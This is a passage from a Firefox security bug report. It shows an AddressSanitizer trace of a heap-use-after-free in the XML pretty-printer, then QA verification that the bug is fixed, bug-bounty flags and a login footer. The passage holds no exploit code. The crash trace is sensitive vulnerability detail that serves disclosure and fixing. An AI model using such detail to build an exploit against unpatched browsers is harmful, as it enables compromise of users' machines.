    #28 0x7f0f585db82f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291
    #29 0x41dbc8 in _start (/home/bogdan.maris/Documents/Asasasan/firefox/firefox+0x41dbc8)

0x622000000100 is located 0 bytes inside of 5768-byte region [0x622000000100,0x622000001788)
freed by thread T0 (file:// Content) here:
    #0 0x4bc0fb in __interceptor_free /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:47:3
    #1 0x7f0f418f779e in mozilla::PresShell::Release() /builds/worker/workspace/build/src/layout/base/PresShell.cpp:840:1
    #2 0x7f0f41a0144b in assign_assuming_AddRef /builds/worker/workspace/build/src/obj-firefox/dist/include/nsCOMPtr.h:355:7
    #3 0x7f0f41a0144b in operator= /builds/worker/workspace/build/src/obj-firefox/dist/include/nsCOMPtr.h:631
    #4 0x7f0f41a0144b in nsDocumentViewer::DestroyPresShell() /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:4645
    #5 0x7f0f419f8774 in nsDocumentViewer::Hide() /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:2245:3
    #6 0x7f0f44a8c2c9 in SetVisibility /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6612:9
    #7 0x7f0f44a8c2c9 in non-virtual thunk to nsDocShell::SetVisibility(bool) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6602
    #8 0x7f0f3d8705fa in nsFrameLoader::Hide() /builds/worker/workspace/build/src/dom/base/nsFrameLoader.cpp:1467:12
    #9 0x7f0f41d5f7e0 in nsSubDocumentFrame::DestroyFrom(nsIFrame*, mozilla::layout::PostFrameDestroyData&) /builds/worker/workspace/build/src/layout/generic/nsSubDocumentFrame.cpp:1029:22
    #10 0x7f0f41cf4bec in nsLineBox::DeleteLineList(nsPresContext*, nsLineList&, nsIFrame*, nsFrameList*, mozilla::layout::PostFrameDestroyData&) /builds/worker/workspace/build/src/layout/generic/nsLineBox.cpp:402:14
    #11 0x7f0f41b1e977 in nsBlockFrame::DestroyFrom(nsIFrame*, mozilla::layout::PostFrameDestroyData&) /builds/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:331:3
    #12 0x7f0f41b1f4dd in DestroyFramesFrom /builds/worker/workspace/build/src/layout/generic/nsFrameList.cpp:59:12
    #13 0x7f0f41b1f4dd in nsContainerFrame::DestroyFrom(nsIFrame*, mozilla::layout::PostFrameDestroyData&) /builds/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:226
    #14 0x7f0f41b7c1b9 in nsCanvasFrame::DestroyFrom(nsIFrame*, mozilla::layout::PostFrameDestroyData&) /builds/worker/workspace/build/src/layout/generic/nsCanvasFrame.cpp:160:21
    #15 0x7f0f41b1f4dd in DestroyFramesFrom /builds/worker/workspace/build/src/layout/generic/nsFrameList.cpp:59:12
    #16 0x7f0f41b1f4dd in nsContainerFrame::DestroyFrom(nsIFrame*, mozilla::layout::PostFrameDestroyData&) /builds/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:226
    #17 0x7f0f41a12934 in nsIFrame::Destroy() /builds/worker/workspace/build/src/layout/generic/nsIFrame.h:674:5
    #18 0x7f0f41b93602 in nsContainerFrame::RemoveFrame(mozilla::layout::FrameChildListID, nsIFrame*) /builds/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:174:16
    #19 0x7f0f419ce368 in RemoveFrame /builds/worker/workspace/build/src/layout/base/nsFrameManager.cpp:535:18
    #20 0x7f0f419ce368 in nsCSSFrameConstructor::ContentRemoved(nsIContent*, nsIContent*, nsIContent*, nsCSSFrameConstructor::RemoveFlags) /builds/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:8820
    #21 0x7f0f419ba424 in nsCSSFrameConstructor::RecreateFramesForContent(nsIContent*, nsCSSFrameConstructor::InsertionKind) /builds/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10020:7
    #22 0x7f0f418e6f5a in mozilla::RestyleManager::ProcessRestyledFrames(nsStyleChangeList&) /builds/worker/workspace/build/src/layout/base/RestyleManager.cpp:1513:25
    #23 0x7f0f4195cafa in mozilla::ServoRestyleManager::DoProcessPendingRestyles(mozilla::ServoTraversalFlags) /builds/worker/workspace/build/src/layout/base/ServoRestyleManager.cpp:1159:9
    #24 0x7f0f4191ba20 in ProcessPendingRestyles /builds/worker/workspace/build/src/layout/base/ServoRestyleManager.cpp:1235:3
    #25 0x7f0f4191ba20 in ProcessPendingRestyles /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RestyleManagerInlines.h:44
    #26 0x7f0f4191ba20 in mozilla::PresShell::DoFlushPendingNotifications(mozilla::ChangesToFlush) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:4196
    #27 0x7f0f3d7d9be0 in FlushPendingNotifications /builds/worker/workspace/build/src/obj-firefox/dist/include/nsIPresShell.h:572:5
    #28 0x7f0f3d7d9be0 in nsDocument::FlushPendingNotifications(mozilla::FlushType, mozilla::FlushTarget) /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:8547
    #29 0x7f0f41666087 in nsComputedDOMStyle::UpdateCurrentStyleSources(bool) /builds/worker/workspace/build/src/layout/style/nsComputedDOMStyle.cpp:946:13
    #30 0x7f0f41667bf1 in nsComputedDOMStyle::GetPropertyCSSValue(nsTSubstring<char16_t> const&, mozilla::ErrorResult&) /builds/worker/workspace/build/src/layout/style/nsComputedDOMStyle.cpp:1160:3
    #31 0x7f0f41665738 in nsComputedDOMStyle::GetPropertyValue(nsTSubstring<char16_t> const&, nsTSubstring<char16_t>&) /builds/worker/workspace/build/src/layout/style/nsComputedDOMStyle.cpp:479:26
    #32 0x7f0f40d12b9e in nsXMLPrettyPrinter::PrettyPrint(nsIDocument*, bool*) /builds/worker/workspace/build/src/dom/xml/nsXMLPrettyPrinter.cpp:81:28
    #33 0x7f0f40d122ff in nsXMLContentSink::MaybePrettyPrint() /builds/worker/workspace/build/src/dom/xml/nsXMLContentSink.cpp:214:17
    #34 0x7f0f40d157c4 in nsXMLContentSink::DidBuildModel(bool) /builds/worker/workspace/build/src/dom/xml/nsXMLContentSink.cpp:306:5
    #35 0x7f0f40d15dc3 in non-virtual thunk to nsXMLContentSink::DidBuildModel(bool) /builds/worker/workspace/build/src/dom/xml/nsXMLContentSink.cpp:264:19
    #36 0x7f0f3c6d8725 in DidBuildModel /builds/worker/workspace/build/src/parser/htmlparser/nsParser.cpp:491:37
    #37 0x7f0f3c6d8725 in nsParser::ResumeParse(bool, bool, bool) /builds/worker/workspace/build/src/parser/htmlparser/nsParser.cpp:1101
    #38 0x7f0f3c6de48c in nsParser::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/parser/htmlparser/nsParser.cpp:1475:10
    #39 0x7f0f3c606f46 in nsDocumentOpenInfo::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsURILoader.cpp:357:15

previously allocated by thread T0 (file:// Content) here:
    #0 0x4bc44c in malloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64:3
    #1 0x4ed85d in moz_xmalloc /builds/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:84:17
    #2 0x7f0f3d7a5733 in operator new /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:206:12
    #3 0x7f0f3d7a5733 in nsDocument::CreateShell(nsPresContext*, nsViewManager*, mozilla::StyleSetHandle) /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:4146
    #4 0x7f0f419f413f in nsDocumentViewer::InitPresentationStuff(bool) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:684:27
    #5 0x7f0f419f3a0f in nsDocumentViewer::InitInternal(nsIWidget*, nsISupports*, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, bool, bool, bool) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:942:10
    #6 0x7f0f419f2c77 in nsDocumentViewer::Init(nsIWidget*, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:659:10
    #7 0x7f0f44a940db in nsDocShell::SetupNewViewer(nsIContentViewer*) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:9558:7
    #8 0x7f0f44a92a9c in nsDocShell::Embed(nsIContentViewer*, char const*, nsISupports*) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7382:17
    #9 0x7f0f44a2b805 in nsDocShell::CreateContentViewer(nsTSubstring<char> const&, nsIRequest*, nsIStreamListener**) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:9365:3
    #10 0x7f0f44a29110 in nsDSURIContentListener::DoContent(nsTSubstring<char> const&, bool, nsIRequest*, nsIStreamListener**, bool*) /builds/worker/workspace/build/src/docshell/base/nsDSURIContentListener.cpp:196:21
    #11 0x7f0f3c60764a in nsDocumentOpenInfo::TryContentListener(nsIURIContentListener*, nsIChannel*) /builds/worker/workspace/build/src/uriloader/base/nsURILoader.cpp:739:28
    #12 0x7f0f3c604df3 in nsDocumentOpenInfo::DispatchContent(nsIRequest*, nsISupports*) /builds/worker/workspace/build/src/uriloader/base/nsURILoader.cpp:417:30
    #13 0x7f0f3c60381b in nsDocumentOpenInfo::OnStartRequest(nsIRequest*, nsISupports*) /builds/worker/workspace/build/src/uriloader/base/nsURILoader.cpp:295:8
    #14 0x7f0f3ab135b7 in nsBaseChannel::OnStartRequest(nsIRequest*, nsISupports*) /builds/worker/workspace/build/src/netwerk/base/nsBaseChannel.cpp:859:25
    #15 0x7f0f3ab60472 in nsInputStreamPump::OnStateStart() /builds/worker/workspace/build/src/netwerk/base/nsInputStreamPump.cpp:518:25
    #16 0x7f0f3ab5fafe in nsInputStreamPump::OnInputStreamReady(nsIAsyncInputStream*) /builds/worker/workspace/build/src/netwerk/base/nsInputStreamPump.cpp:421:25
    #17 0x7f0f3a950c2d in nsInputStreamReadyEvent::Run() /builds/worker/workspace/build/src/xpcom/io/nsStreamUtils.cpp:97:20
    #18 0x7f0f3a992a81 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:396:25
    #19 0x7f0f3a9b7ab6 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1037:14
    #20 0x7f0f3a9d1f78 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:513:10
    #21 0x7f0f3b7a4771 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
    #22 0x7f0f3b704d7b in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #23 0x7f0f3b704d7b in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #24 0x7f0f3b704d7b in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #25 0x7f0f41191cdf in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:158:27
    #26 0x7f0f454adf97 in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:877:22
    #27 0x7f0f3b704d7b in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #28 0x7f0f3b704d7b in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #29 0x7f0f3b704d7b in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #30 0x7f0f454ad94a in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:703:34
    #31 0x4ec2de in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:63:30
    #32 0x4ec2de in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:280
    #33 0x7f0f585db82f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291

SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/build/src/dom/xml/nsXMLPrettyPrinter.cpp:157:16 in nsXMLPrettyPrinter::PrettyPrint(nsIDocument*, bool*)
Shadow bytes around the buggy address:
  0x0c447fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c447fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c447fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c447fff8000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c447fff8010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c447fff8020:[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c447fff8030: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c447fff8040: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c447fff8050: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c447fff8060: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c447fff8070: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==3249==ABORTING
[Parent 2993, Gecko_IOThread] WARNING: pipe error (115): Connection reset by peer: file /builds/worker/workspace/build/src/ipc/chromium/src/chrome/common/ipc_channel_posix.cc, line 353

I verified that the crash does not reproduce anymore using latest Nightly 59.0a1 and latest 58.0 asan build across platforms on Ubuntu 16.04 64bit and regular latest Nightly 59.0a1 and 58.0RC on macOS 10.13.2 and Windows 10 64bit.
Status: RESOLVED → VERIFIED
status-firefox58: fixed → verified
status-firefox59: fixed → verified
Flags: qe-verify+
Flags: sec-bounty?
Flags: sec-bounty? → sec-bounty+
Group: core-security-release
You need to log in before you can comment on or make changes to this bug.